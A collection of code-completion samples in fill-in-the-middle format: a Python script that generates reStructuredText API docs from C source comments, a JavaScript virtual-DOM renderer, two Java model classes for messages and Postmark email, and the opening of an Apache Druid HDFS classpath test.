'MonitorHandler' : '`MonitorHandler`_',
'MontageInfo' : '`MontageInfo`_',
'NoiseType' : '`NoiseType`_',
'PaintMethod' : '`PaintMethod`_',
'PixelPacket' : '`PixelPacket`_',
'PointInfo' : '`PointInfo`_',
'ProfileInfo' : '`ProfileInfo`_',
'QuantizeInfo' : '`QuantizeInfo`_',
'Quantum' : '`Quantum`_',
'QuantumType' : '`QuantumType`_',
'RectangleInfo' : '`RectangleInfo`_',
'RegistryType' : '`RegistryType`_',
'RenderingIntent' : '`RenderingIntent`_',
'ResolutionType' : '`ResolutionType`_',
'ResourceType' : '`ResourceType`_',
'SegmentInfo' : '`SegmentInfo`_',
'SignatureInfo' : '`SignatureInfo`_',
'StorageType' : '`StorageType`_',
'StreamHandler' : '`StreamHandler`_',
'StretchType' : '`StretchType`_',
'StyleType' : '`StyleType`_',
'TypeMetric' : '`TypeMetric`_',
'ViewInfo' : '`ViewInfo`_',
'VirtualPixelMethod' : '`VirtualPixelMethod`_',
'MagickXResourceInfo' : '`MagickXResourceInfo`_',
}
state_init = 0
state_found_fcncomment = 1
state_found_fcntitle = 2
state_found_fcndoc = 3
state_more_prototype = 4
state_found_prototype = 5
state_found_private = 6
state_parmdescr = 7
def warn(msg):
print >> sys.stderr, msg
def debugtrace(msg):
print >> sys.stdout, msg
def nodebugtrace(msg):
pass
dtrace = nodebugtrace
#dtrace = debugtrace
# extract and save function title. example:
# + X M a g i c k C o m m a n d %
# % X A n i m a t e B a c k g r o u n d I m a g e %
# Lines starting with '+' are private APIs which should not appear in
# in the output.
re_func_title = re.compile(r'^[+|%]\s+((\w )+)\s*%')
def proto_pretty(line):
"""fixes up inconsistent spaces in C function prototypes"""
line = re.sub(r',', ' , ', line)
line = re.sub(r'\(', ' ( ', line)
line = re.sub(r'\)', ' ) ', line)
line = re.sub(r'\*', ' * ', line)
line = re.sub(r'\s+', ' ', line)
line = re.sub(r'\(\s+\*', '(*', line)
line = re.sub(r' ,', ',', line)
line = re.sub(r' \(', '(', line)
line = re.sub(r'\) ', ')', line)
line = re.sub(r' \* ', ' *', line)
line = re.sub('^\s*', '', line)
return line
class Paragraph:
"Paragraphs consist of one or more lines of text."
def __init__(self):
self.lines = []
def __str__(self):
#return '\n'.join(self.lines)
return '\n'.join([line.strip() for line in self.lines])
class Prototype:
def __init__(self):
self.lines = []
def __str__(self):
proto = ' '.join(self.lines)
proto = proto_pretty(proto)
# escape all the '*' chars
proto = re.sub(r'\*', '\\*', proto)
# escape all the '_' chars
proto = re.sub(r'_', '\\_', proto)
# now replace keywords with hyperlinks
for k,v in keywords.iteritems():
proto = re.sub(r'^%s ' % k, '%s ' % v, proto)
proto = re.sub(r' %s ' % k, ' %s ' % v, proto)
# make some attempt to wrap the text nicely
openparen_index = proto.find('(')
if openparen_index > 0:
fcn = proto[:openparen_index+1]
indent_len = len(fcn) + 3
toomuch = (2 * fcn.count('\\')) + (3 * fcn.count('`_'))
if toomuch > 0: # account for the space following the opening paren
toomuch -= 1
indent_len -= toomuch
params = proto[openparen_index+1:].split(',')
params = [p.strip() for p in params]
max_param_len = 0
for x in params:
if len(x) > max_param_len:
max_param_len = len(x)
wrap_width = max(96, max_param_len + indent_len)
proto_lines = []
line = fcn + ' '
while params:
x = params.pop(0)
if len(line) + len(x) > wrap_width:
proto_lines.append(line)
line = ' ' * indent_len
line += x
if params:
line += ', '
proto_lines.append(line)
proto = '\n '.join(proto_lines)
return ".. parsed-literal::\n\n %s" % proto
class ListItem:
"""List items are used for parameter descriptions, and consist of the
parameter name and one or more lines of description text."""
def __init__(self, name):
self.name = name
self.lines = []
def __str__(self):
s = []
s.append('%s:' % self.name)
for line in self.lines:
s.append(' %s' % line.strip())
return '\n'.join(s)
class Function:
def __init__(self, name):
self.name = name
self.prototype = None
# Description is a list, the items of which are either Paragraph or
# ListItem or Prototype instances.
self.description = []
def __str__(self):
lines = []
lines.append('')
lines.append('')
lines.append(self.name)
lines.append('=' * len(self.name))
lines.append('')
lines.append('Synopsis')
lines.append('--------')
lines.append(str(self.prototype))
lines.append('')
lines.append('Description')
lines.append('-----------')
for item in self.description:
lines.append(str(item))
lines.append('')
return '\n'.join(lines)
def parse(srcfilepath):
list_item = None
proto = None
para = None
func = None
functions = []
state = state_init
linecnt = 0
ftitle = None
f = file(srcfilepath, 'r')
for line in f:
linecnt += 1
if not (line.startswith('%') or line.startswith('+') or re.search(r'\*/', line)):
continue
line = line.strip()
if state == state_init:
# Find first line of function title/comment block
if line.startswith('%%%%%%%%'):
dtrace('Line %d: start of function comment block ############' % linecnt)
state = state_found_fcncomment
continue
elif state == state_found_fcncomment:
# Search for the function name, with spaces between each letter
if line.startswith('%%%%%%%%'):
warn('Line %d: WARNING: no function name found, found start of function comment block instead.' % linecnt)
state = state_init
continue
m = re_func_title.search(line)
if m:
if line.startswith('+'):
dtrace('Line %d: private API' % linecnt)
# private API, skip it
state = state_found_private
else:
# public API, process it
ftitle = re.sub(' ', '', m.group(1))
dtrace('Line %d: public API %s' % (linecnt, ftitle))
func = Function(ftitle)
functions.append(func)
state = state_found_fcntitle
continue
elif state == state_found_private:
# skip to end of function title block
if line.startswith('%%%%%%%%'):
dtrace('Line %d: end of private function comment block' % linecnt)
state = state_init
continue
elif state == state_found_fcntitle:
# skip to first line following end of function title block.
# lines of the function title block start with and end with '%'.
if not re.match(r'%.+%', line):
dtrace('Line %d: end of public function comment block %s' % (linecnt, ftitle))
state = state_found_fcndoc
# fall through
elif state == state_found_fcndoc:
# extract function prototype
if line.startswith('% '):
line = re.sub(r'^%\s{0,2}', '', line, 1)
# if empty args (), it's not the prototype, but the one-line summary
if re.search(r'%s\(\)' % ftitle, line):
if para is None:
dtrace('Line %d: found_fcndoc start paragraph ()' % linecnt)
para = Paragraph()
func.description.append(para)
para.lines.append(line)
# is this only line of prototype?
elif re.search(r'%s\([^)]+\)$' % ftitle, line):
if para:
dtrace('Line %d: found_fcndoc end paragraph by proto ()' % linecnt)
para = None
dtrace('Line %d: one-line prototype' % linecnt)
proto = Prototype()
proto.lines.append(line)
func.description.append(proto)
func.prototype = proto
proto = None
state = state_found_prototype
# is this first line of multiline prototype?
elif re.search(r'%s\([^)]*$' % ftitle, line):
if para:
dtrace('Line %d: found_fcndoc end paragraph by proto (' % linecnt)
para = None
dtrace('Line %d: first line of multi-line prototype' % linecnt)
proto = Prototype()
proto.lines.append(line)
func.description.append(proto)
func.prototype = proto
state = state_more_prototype
else:
if para is None:
dtrace('Line %d: found_fcndoc start paragraph' % linecnt)
para = Paragraph()
func.description.append(para)
para.lines.append(line)
else:
if line.startswith('%%%%%%%%'):
warn('Line %d: WARNING: no prototype found for %s, found start of function comment block instead.' % (linecnt, ftitle))
state = state_found_fcncomment
continue
if line.strip() == '%':
# empty line terminates paragraph
if para:
dtrace('Line %d: found_fcndoc end paragraph by blank line' % linecnt)
para = None
if proto:
dtrace('Line %d: found_fcndoc end proto by blank line' % linecnt)
proto = None
continue
elif state == state_more_prototype:
if re.match(r'%.+%', line):
# really this should raise a warning of "incomplete prototype"
continue
line = re.sub(r'^%\s{0,2}', '', line, 1)
if re.search(r'^\s*$', line):
dtrace('Line %d: end of more prototype' % linecnt)
state = state_found_prototype
else:
func.prototype.lines.append(line)
continue
elif state == state_found_prototype:
dtrace('Line %d: found prototype of function %s' % (linecnt, ftitle))
func.prototype.lines.append(';')
#print 'Function %s' % func.name
#print 'Synopsis'
#print ' '.join(func.prototype)
#print
# Process parm description.
# Description consists of two kinds of texts: paragraphs, and lists.
# Lists consist of list items. List items are one or more lines.
# List items are separated by blank lines. The first line of a list
# item starts with 'o '.
# Paragraphs consist of one or more lines which don't start with 'o '.
# Paragraphs are separated from each other and from adjacent list items
# by blank lines.
# In theory, a line which starts with 'o ' which is not preceded by a
# blank line is illegal syntax.
para = None
state = state_parmdescr
# fall through
elif state == state_parmdescr:
if line.endswith('*/'):
# end of function comment block
dtrace('Line %d: end of parmdescr ************' % linecnt)
if list_item:
func.description.append(list_item)
list_item = None
if para:
func.description.append(para)
dtrace('Line %d: parmdescr end paragraph ()' % linecnt)
para = None
func = None
state = state_init
continue
line = re.sub(r'^%\s{0,2}', '', line, 1)
if line:
# look for list item, which starts with 'o'
m = re.search(r'^\s+o\s+([^:]+:|o|[0-9]\.)\s(.*)', line)
if m:
# first line of list item
if list_item: # if blank lines separate list items, this should never evaluate true
dtrace('Line %d: surprising end of list item' % linecnt)
func.description.append(list_item)
list_item = None
dtrace('Line %d: start list item' % linecnt)
list_item = ListItem(m.group(1).strip().rstrip(':'))
list_item.lines.append(m.group(2))
else:
# either a line of paragraph or subsequent line of list item
if list_item:
# subsequent line of list item
list_item.lines.append(line)
else:
# line of paragraph
if list_item: # if blank lines after list items, this should never evaluate true
dtrace('Line %d: end of list item, end of list' % linecnt)
func.description.append(list_item)
list_item = None
if para is None:
dtrace('Line %d: parmdescr start paragraph' % linecnt)
para = Paragraph()
para.lines.append(line)
else:
# empty line, two cases:
# 1. terminate multi-line list item
# 2. terminate multi-line paragraph
if list_item:
dtrace('Line %d: parmdescr end of list item by blank line' % linecnt)
func.description.append(list_item)
list_item = None
elif para:
# terminate any paragraph
dtrace('Line %d: parmdescr end of paragraph by blank line' % linecnt)
func.description.append(para)
para = None
continue
f.close()
return functions
def process_srcfile(srcfilepath, basename, whatis, outfile, include_rst):
"""outfile is a file object open for writing"""
functions = parse(srcfilepath)
print >> outfile, "=" * len(basename)
print >> outfile, basename
print >> outfile, "=" * len(basename)
if whatis:
print >> outfile, "-" * len(whatis)
print >> outfile, whatis
print >> outfile, "-" * len(whatis)
print >> outfile
print >> outfile, '.. contents:: :depth: 1'
print >> outfile
for x in include_rst:<|fim▁hole|> for func in functions:
print >> outfile, func
#para = para.strip() # trim leading and trailing whitespace
#para = re.sub(r'\s+', ' ', para) # canonicalize inner whitespace
#para = re.sub(r"""([a-zA-Z0-9][.!?][)'"]*) """, '\1 ', para) # Fix sentence ends
def find_val(key, keyval_file):
val = None
f = file(keyval_file, 'r')
cnt = 0
for line in f:
cnt += 1
if not line.strip():
continue
if line.startswith('#'):
continue
try:
k, v = line.split(None, 1)
except ValueError:
print >> sys.stderr, "Line %u of %s: improper format" % (cnt, keyval_file)
return None
if k == key:
val = v
break
f.close()
return val.strip()
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
# parse command line options
try:
opts, posn_args = getopt.getopt(argv, 'hw:i:',
['help',
'whatis-file=',
'include-rst=',
])
except getopt.GetoptError, msg:
print msg
print __doc__
return 1
# process options
whatis_file = None
include_rst = ['api_hyperlinks.rst']
for opt, val in opts:
if opt in ("-h", "--help"):
print __doc__
return 0
if opt in ("-w", "--whatis-file"):
whatis_file = val
if opt in ("-i", "--include-rst"):
include_rst = [x for x in val.split(',') if x]
if len(posn_args) != 2:
print >> sys.stderr, 'Missing arguments'
print >> sys.stderr, __doc__
return 1
srcfile_path = posn_args[0]
outfile_path = posn_args[1]
srcfile = os.path.basename(srcfile_path)
base, ext = os.path.splitext(srcfile)
if whatis_file:
whatis = find_val(srcfile, whatis_file)
else:
whatis = None
fout = file(outfile_path, 'w')
process_srcfile(srcfile_path, base, whatis, fout, include_rst)
fout.close()
return 0
if __name__ == '__main__':
sys.exit(main())<|fim▁end|> | print >> outfile, '.. include:: %s' % x
print >> outfile
# print all functions found in this source file |
<|file_name|>vdom-my.js<|end_file_name|><|fim▁begin|>export function Fragment(props, ...children) {
return collect(children);
}
const ATTR_PROPS = '_props';
function collect(children) {
const ch = [];
const push = (c) => {
if (c !== null && c !== undefined && c !== '' && c !== false) {
ch.push((typeof c === 'function' || typeof c === 'object') ? c : `${c}`);
}
};
children && children.forEach(c => {
if (Array.isArray(c)) {
c.forEach(i => push(i));
}
else {
push(c);
}
});
return ch;
}
export function createElement(tag, props, ...children) {
const ch = collect(children);
if (typeof tag === 'string')
return { tag, props, children: ch };
else if (Array.isArray(tag))
return tag; // JSX fragments - babel
else if (tag === undefined && children)
return ch; // JSX fragments - typescript
else if (Object.getPrototypeOf(tag).__isAppRunComponent)
return { tag, props, children: ch }; // createComponent(tag, { ...props, children });
else if (typeof tag === 'function')
return tag(props, ch);
else
throw new Error(`Unknown tag in vdom ${tag}`);
}
;
const keyCache = new WeakMap();
export const updateElement = render;
export function render(element, nodes, parent = {}) {
// console.log('render', element, node);
// tslint:disable-next-line
if (nodes == null || nodes === false)
return;
nodes = createComponent(nodes, parent);
const isSvg = (element === null || element === void 0 ? void 0 : element.nodeName) === "SVG";
if (!element)
return;
if (Array.isArray(nodes)) {
updateChildren(element, nodes, isSvg);
}
else {
updateChildren(element, [nodes], isSvg);
}
}
function same(el, node) {
// if (!el || !node) return false;
const key1 = el.nodeName;
const key2 = `${node.tag || ''}`;
return key1.toUpperCase() === key2.toUpperCase();
}
function update(element, node, isSvg) {
if (node['_op'] === 3)
return;
// console.assert(!!element);
isSvg = isSvg || node.tag === "svg";
if (!same(element, node)) {
element.parentNode.replaceChild(create(node, isSvg), element);
return;
}
!(node['_op'] & 2) && updateChildren(element, node.children, isSvg);
!(node['_op'] & 1) && updateProps(element, node.props, isSvg);
}
function updateChildren(element, children, isSvg) {
var _a;
const old_len = ((_a = element.childNodes) === null || _a === void 0 ? void 0 : _a.length) || 0;
const new_len = (children === null || children === void 0 ? void 0 : children.length) || 0;
const len = Math.min(old_len, new_len);
for (let i = 0; i < len; i++) {
const child = children[i];
if (child['_op'] === 3)
continue;
const el = element.childNodes[i];
if (typeof child === 'string') {
if (el.textContent !== child) {
if (el.nodeType === 3) {
el.nodeValue = child;
}
else {
element.replaceChild(createText(child), el);
}
}
}
else if (child instanceof HTMLElement || child instanceof SVGElement) {
element.insertBefore(child, el);
}
else {
const key = child.props && child.props['key'];
if (key) {
if (el.key === key) {
update(element.childNodes[i], child, isSvg);
}
else {
// console.log(el.key, key);
const old = keyCache[key];
if (old) {
const temp = old.nextSibling;
element.insertBefore(old, el);
temp ? element.insertBefore(el, temp) : element.appendChild(el);
update(element.childNodes[i], child, isSvg);
}
else {
element.replaceChild(create(child, isSvg), el);
}
}
}
else {
update(element.childNodes[i], child, isSvg);
}
}
}
let n = element.childNodes.length;
while (n > len) {
element.removeChild(element.lastChild);
n--;
}
if (new_len > len) {
const d = document.createDocumentFragment();
for (let i = len; i < children.length; i++) {
d.appendChild(create(children[i], isSvg));
}
element.appendChild(d);
}
}
function createText(node) {
if ((node === null || node === void 0 ? void 0 : node.indexOf('_html:')) === 0) { // ?
const div = document.createElement('div');
div.insertAdjacentHTML('afterbegin', node.substring(6));
return div;
}
else {
return document.createTextNode(node !== null && node !== void 0 ? node : '');
}
}
function create(node, isSvg) {
// console.assert(node !== null && node !== undefined);
if ((node instanceof HTMLElement) || (node instanceof SVGElement))
return node;
if (typeof node === "string")
return createText(node);
if (!node.tag || (typeof node.tag === 'function'))
return createText(JSON.stringify(node));
isSvg = isSvg || node.tag === "svg";
const element = isSvg
? document.createElementNS("http://www.w3.org/2000/svg", node.tag)
: document.createElement(node.tag);
updateProps(element, node.props, isSvg);
if (node.children)
node.children.forEach(child => element.appendChild(create(child, isSvg)));
return element;
}
function mergeProps(oldProps, newProps) {
newProps['class'] = newProps['class'] || newProps['className'];
delete newProps['className'];
const props = {};
if (oldProps)
Object.keys(oldProps).forEach(p => props[p] = null);
if (newProps)
Object.keys(newProps).forEach(p => props[p] = newProps[p]);
return props;
}
export function updateProps(element, props, isSvg) {
// console.assert(!!element);
const cached = element[ATTR_PROPS] || {};
props = mergeProps(cached, props || {});
element[ATTR_PROPS] = props;
for (const name in props) {
const value = props[name];
// if (cached[name] === value) continue;
// console.log('updateProps', name, value);
if (name.startsWith('data-')) {
const dname = name.substring(5);
const cname = dname.replace(/-(\w)/g, (match) => match[1].toUpperCase());
if (element.dataset[cname] !== value) {
if (value || value === "")
element.dataset[cname] = value;
else
delete element.dataset[cname];
}
}
else if (name === 'style') {
if (element.style.cssText)
element.style.cssText = '';
if (typeof value === 'string')
element.style.cssText = value;
else {
for (const s in value) {
if (element.style[s] !== value[s])
element.style[s] = value[s];
}
}
}
else if (name.startsWith('xlink')) {
const xname = name.replace('xlink', '').toLowerCase();
if (value == null || value === false) {
element.removeAttributeNS('http://www.w3.org/1999/xlink', xname);
}
else {
element.setAttributeNS('http://www.w3.org/1999/xlink', xname, value);
}
}
else if (name.startsWith('on')) {
if (!value || typeof value === 'function') {
element[name] = value;
}
else if (typeof value === 'string') {
if (value)
element.setAttribute(name, value);
else
element.removeAttribute(name);
}
}
else if (/^id$|^class$|^list$|^readonly$|^contenteditable$|^role|-/g.test(name) || isSvg) {
if (element.getAttribute(name) !== value) {
if (value)
element.setAttribute(name, value);
else
element.removeAttribute(name);
}
}
else if (element[name] !== value) {
element[name] = value;
}
if (name === 'key' && value)
keyCache[value] = element;
}
if (props && typeof props['ref'] === 'function') {
window.requestAnimationFrame(() => props['ref'](element));
}
}
function render_component(node, parent, idx) {
const { tag, props, children } = node;
let key = `_${idx}`;
let id = props && props['id'];
if (!id)
id = `_${idx}${Date.now()}`;
else
key = id;
let asTag = 'section';
if (props && props['as']) {
asTag = props['as'];
delete props['as'];
}
if (!parent.__componentCache)
parent.__componentCache = {};
let component = parent.__componentCache[key];
if (!component || !(component instanceof tag) || !component.element) {
const element = document.createElement(asTag);
component = parent.__componentCache[key] = new tag(Object.assign(Object.assign({}, props), { children })).start(element);
}
if (component.mounted) {
const new_state = component.mounted(props, children, component.state);
(typeof new_state !== 'undefined') && component.setState(new_state);
}
updateProps(component.element, props, false);
return component.element;
}
function createComponent(node, parent, idx = 0) {
var _a;
if (typeof node === 'string')
return node;
if (Array.isArray(node))
return node.map(child => createComponent(child, parent, idx++));
let vdom = node;
if (node && typeof node.tag === 'function' && Object.getPrototypeOf(node.tag).__isAppRunComponent) {
vdom = render_component(node, parent, idx);
}
if (vdom && Array.isArray(vdom.children)) {
const new_parent = (_a = vdom.props) === null || _a === void 0 ? void 0 : _a._component;
if (new_parent) {
let i = 0;
vdom.children = vdom.children.map(child => createComponent(child, new_parent, i++));
}
else {
vdom.children = vdom.children.map(child => createComponent(child, parent, idx++));
}
}
return vdom;
}<|fim▁hole|><|fim▁end|> | //# sourceMappingURL=vdom-my.js.map |
<|file_name|>MessageBean.java<|end_file_name|><|fim▁begin|>/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package com.cgc.bean;
import java.sql.Timestamp;
/**
*
* @author com02
*/
public class MessageBean {
private int runno;<|fim▁hole|> private String message_id;
private String message_detail;
private String status;
private Timestamp create_date;
private String create_by;
private Timestamp update_date;
private String update_by;
private String delete_flag;
private Timestamp delete_date;
private String delete_by;
private String company_id;
/**
* @return the runno
*/
public int getRunno() {
return runno;
}
/**
* @param runno the runno to set
*/
public void setRunno(int runno) {
this.runno = runno;
}
/**
* @return the message_id
*/
public String getMessage_id() {
return message_id;
}
/**
* @param message_id the message_id to set
*/
public void setMessage_id(String message_id) {
this.message_id = message_id;
}
/**
* @return the message_detail
*/
public String getMessage_detail() {
return message_detail;
}
/**
* @param message_detail the message_detail to set
*/
public void setMessage_detail(String message_detail) {
this.message_detail = message_detail;
}
/**
* @return the status
*/
public String getStatus() {
return status;
}
/**
* @param status the status to set
*/
public void setStatus(String status) {
this.status = status;
}
/**
* @return the create_date
*/
public Timestamp getCreate_date() {
return create_date;
}
/**
* @param create_date the create_date to set
*/
public void setCreate_date(Timestamp create_date) {
this.create_date = create_date;
}
/**
* @return the create_by
*/
public String getCreate_by() {
return create_by;
}
/**
* @param create_by the create_by to set
*/
public void setCreate_by(String create_by) {
this.create_by = create_by;
}
/**
* @return the update_date
*/
public Timestamp getUpdate_date() {
return update_date;
}
/**
* @param update_date the update_date to set
*/
public void setUpdate_date(Timestamp update_date) {
this.update_date = update_date;
}
/**
* @return the update_by
*/
public String getUpdate_by() {
return update_by;
}
/**
* @param update_by the update_by to set
*/
public void setUpdate_by(String update_by) {
this.update_by = update_by;
}
/**
* @return the delete_flag
*/
public String getDelete_flag() {
return delete_flag;
}
/**
* @param delete_flag the delete_flag to set
*/
public void setDelete_flag(String delete_flag) {
this.delete_flag = delete_flag;
}
/**
* @return the delete_date
*/
public Timestamp getDelete_date() {
return delete_date;
}
/**
* @param delete_date the delete_date to set
*/
public void setDelete_date(Timestamp delete_date) {
this.delete_date = delete_date;
}
/**
* @return the delete_by
*/
public String getDelete_by() {
return delete_by;
}
/**
* @param delete_by the delete_by to set
*/
public void setDelete_by(String delete_by) {
this.delete_by = delete_by;
}
/**
* @return the company_id
*/
public String getCompany_id() {
return company_id;
}
/**
* @param company_id the company_id to set
*/
public void setCompany_id(String company_id) {
this.company_id = company_id;
}
}<|fim▁end|> | |
<|file_name|>PostmarkEMail.java<|end_file_name|><|fim▁begin|>package com.diggime.modules.email.model.impl;
import com.diggime.modules.email.model.EMail;
import com.diggime.modules.email.model.MailContact;
import org.json.JSONObject;
import java.time.LocalDateTime;
import java.util.List;
import static org.foilage.utils.checkers.NullChecker.notNull;
public class PostmarkEMail implements EMail {
private final int id;
private final String messageId;
private final LocalDateTime sentDate;
private final MailContact sender;
private final List<MailContact> receivers;
private final List<MailContact> carbonCopies;
private final List<MailContact> blindCarbonCopies;
private final String subject;
private final String tag;
private final String htmlBody;
private final String textBody;
public PostmarkEMail(LocalDateTime sentDate, MailContact sender, List<MailContact> receivers, List<MailContact> carbonCopies, List<MailContact> blindCarbonCopies, String subject, String tag, String htmlBody, String textBody) {
this.id = 0;
this.messageId = "";
this.sentDate = notNull(sentDate);
this.sender = notNull(sender);
this.receivers = notNull(receivers);
this.carbonCopies = notNull(carbonCopies);
this.blindCarbonCopies = notNull(blindCarbonCopies);
this.subject = notNull(subject);
this.tag = notNull(tag);
this.htmlBody = notNull(htmlBody);
this.textBody = notNull(textBody);
}
public PostmarkEMail(String messageId, LocalDateTime sentDate, MailContact sender, List<MailContact> receivers, List<MailContact> carbonCopies, List<MailContact> blindCarbonCopies, String subject, String tag, String htmlBody, String textBody) {
this.id = 0;
this.messageId = notNull(messageId);
this.sentDate = notNull(sentDate);
this.sender = notNull(sender);
this.receivers = notNull(receivers);
this.carbonCopies = notNull(carbonCopies);
this.blindCarbonCopies = notNull(blindCarbonCopies);
this.subject = notNull(subject);
this.tag = notNull(tag);
this.htmlBody = notNull(htmlBody);
this.textBody = notNull(textBody);
}
public PostmarkEMail(EMail mail, String messageId) {
this.id = mail.getId();
this.messageId = notNull(messageId);
this.sentDate = mail.getSentDate();
this.sender = mail.getSender();
this.receivers = mail.getReceivers();
this.carbonCopies = mail.getCarbonCopies();
this.blindCarbonCopies = mail.getBlindCarbonCopies();
this.subject = mail.getSubject();
this.tag = mail.getTag();
this.htmlBody = mail.getHtmlBody();
this.textBody = mail.getTextBody();
}
public PostmarkEMail(int id, String messageId, LocalDateTime sentDate, MailContact sender, List<MailContact> receivers, List<MailContact> carbonCopies, List<MailContact> blindCarbonCopies, String subject, String tag, String htmlBody, String textBody) {
this.id = id;
this.messageId = notNull(messageId);
this.sentDate = notNull(sentDate);
this.sender = notNull(sender);
this.receivers = notNull(receivers);
this.carbonCopies = notNull(carbonCopies);
this.blindCarbonCopies = notNull(blindCarbonCopies);
this.subject = notNull(subject);<|fim▁hole|> this.htmlBody = notNull(htmlBody);
this.textBody = notNull(textBody);
}
@Override
public int getId() {
return id;
}
@Override
public String getMessageId() {
return messageId;
}
@Override
public LocalDateTime getSentDate() {
return sentDate;
}
@Override
public MailContact getSender() {
return sender;
}
@Override
public List<MailContact> getReceivers() {
return receivers;
}
@Override
public List<MailContact> getCarbonCopies() {
return carbonCopies;
}
@Override
public List<MailContact> getBlindCarbonCopies() {
return blindCarbonCopies;
}
@Override
public String getSubject() {
return subject;
}
@Override
public String getTag() {
return tag;
}
@Override
public String getHtmlBody() {
return htmlBody;
}
@Override
public String getTextBody() {
return textBody;
}
@Override
public JSONObject getJSONObject() {
JSONObject obj = new JSONObject();
obj.put("From", sender.getName()+" <"+sender.getAddress()+">");
addReceivers(obj, receivers, "To");
addReceivers(obj, carbonCopies, "Cc");
addReceivers(obj, blindCarbonCopies, "Bcc");
obj.put("Subject", subject);
if(tag.length()>0) {
obj.put("Tag", tag);
}
if(htmlBody.length()>0) {
obj.put("HtmlBody", htmlBody);
} else {
obj.put("HtmlBody", textBody);
}
if(textBody.length()>0) {
obj.put("TextBody", textBody);
}
return obj;
}
private void addReceivers(JSONObject obj, List<MailContact> sendList, String jsonType) {
boolean first = true;
StringBuilder sb = new StringBuilder();
for(MailContact contact: sendList) {
if(first) {
first = false;
} else {
sb.append(", ");
}
sb.append(contact.getName());
sb.append(" <");
sb.append(contact.getAddress());
sb.append(">");
}
if(sendList.size()>0) {
obj.put(jsonType, sb.toString());
}
}
}<|fim▁end|> | this.tag = notNull(tag); |
<|file_name|>HdfsClasspathSetupTest.java<|end_file_name|><|fim▁begin|>/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.druid.indexer;
import com.google.common.util.concurrent.Futures;
import com.google.common.util.concurrent.ListenableFuture;
import com.google.common.util.concurrent.ListeningExecutorService;
import com.google.common.util.concurrent.MoreExecutors;
import org.apache.commons.io.IOUtils;
import org.apache.druid.common.utils.UUIDUtils;
import org.apache.druid.java.util.common.FileUtils;
import org.apache.druid.java.util.common.IOE;
import org.apache.druid.java.util.common.StringUtils;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.hdfs.DistributedFileSystem;
import org.apache.hadoop.hdfs.MiniDFSCluster;
import org.apache.hadoop.mapreduce.Job;
import org.apache.hadoop.mapreduce.MRJobConfig;
import org.junit.After;
import org.junit.AfterClass;
import org.junit.Assert;
import org.junit.Before;
import org.junit.BeforeClass;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.TemporaryFolder;
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.StandardCopyOption;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.Callable;
import java.util.concurrent.CyclicBarrier;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
public class HdfsClasspathSetupTest
{
private static MiniDFSCluster miniCluster;
private static File hdfsTmpDir;
private static Configuration conf;
private static String dummyJarString = "This is a test jar file.";
private File dummyJarFile;
private Path finalClasspath;
private Path intermediatePath;
@Rule
public final TemporaryFolder tempFolder = new TemporaryFolder();
@BeforeClass
public static void setupStatic() throws IOException
{
hdfsTmpDir = File.createTempFile("hdfsClasspathSetupTest", "dir");
if (!hdfsTmpDir.delete()) {
throw new IOE("Unable to delete hdfsTmpDir [%s]", hdfsTmpDir.getAbsolutePath());
}
conf = new Configuration(true);
conf.set(MiniDFSCluster.HDFS_MINIDFS_BASEDIR, hdfsTmpDir.getAbsolutePath());
miniCluster = new MiniDFSCluster.Builder(conf).build();
}
@Before
public void setUp() throws IOException
{
// intermedatePath and finalClasspath are relative to hdfsTmpDir directory.
intermediatePath = new Path(StringUtils.format("/tmp/classpath/%s", UUIDUtils.generateUuid()));
finalClasspath = new Path(StringUtils.format("/tmp/intermediate/%s", UUIDUtils.generateUuid()));
dummyJarFile = tempFolder.newFile("dummy-test.jar");
Files.copy(
new ByteArrayInputStream(StringUtils.toUtf8(dummyJarString)),
dummyJarFile.toPath(),
StandardCopyOption.REPLACE_EXISTING
);
}
@AfterClass
public static void tearDownStatic() throws IOException
{
if (miniCluster != null) {
miniCluster.shutdown(true);
}
FileUtils.deleteDirectory(hdfsTmpDir);
}
@After
public void tearDown() throws IOException
{
dummyJarFile.delete();
Assert.assertFalse(dummyJarFile.exists());
miniCluster.getFileSystem().delete(finalClasspath, true);
Assert.assertFalse(miniCluster.getFileSystem().exists(finalClasspath));
miniCluster.getFileSystem().delete(intermediatePath, true);
Assert.assertFalse(miniCluster.getFileSystem().exists(intermediatePath));
}
@Test
public void testAddSnapshotJarToClasspath() throws IOException
{
Job job = Job.getInstance(conf, "test-job");
DistributedFileSystem fs = miniCluster.getFileSystem();
Path intermediatePath = new Path("/tmp/classpath");
JobHelper.addSnapshotJarToClassPath(dummyJarFile, intermediatePath, fs, job);
Path expectedJarPath = new Path(intermediatePath, dummyJarFile.getName());
// check file gets uploaded to HDFS
Assert.assertTrue(fs.exists(expectedJarPath));
// check file gets added to the classpath
Assert.assertEquals(expectedJarPath.toString(), job.getConfiguration().get(MRJobConfig.CLASSPATH_FILES));
Assert.assertEquals(dummyJarString, StringUtils.fromUtf8(IOUtils.toByteArray(fs.open(expectedJarPath))));
}
@Test
public void testAddNonSnapshotJarToClasspath() throws IOException
{
Job job = Job.getInstance(conf, "test-job");
DistributedFileSystem fs = miniCluster.getFileSystem();
JobHelper.addJarToClassPath(dummyJarFile, finalClasspath, intermediatePath, fs, job);
Path expectedJarPath = new Path(finalClasspath, dummyJarFile.getName());
// check file gets uploaded to final HDFS path
Assert.assertTrue(fs.exists(expectedJarPath));
// check that the intermediate file gets deleted
Assert.assertFalse(fs.exists(new Path(intermediatePath, dummyJarFile.getName())));
// check file gets added to the classpath
Assert.assertEquals(expectedJarPath.toString(), job.getConfiguration().get(MRJobConfig.CLASSPATH_FILES));
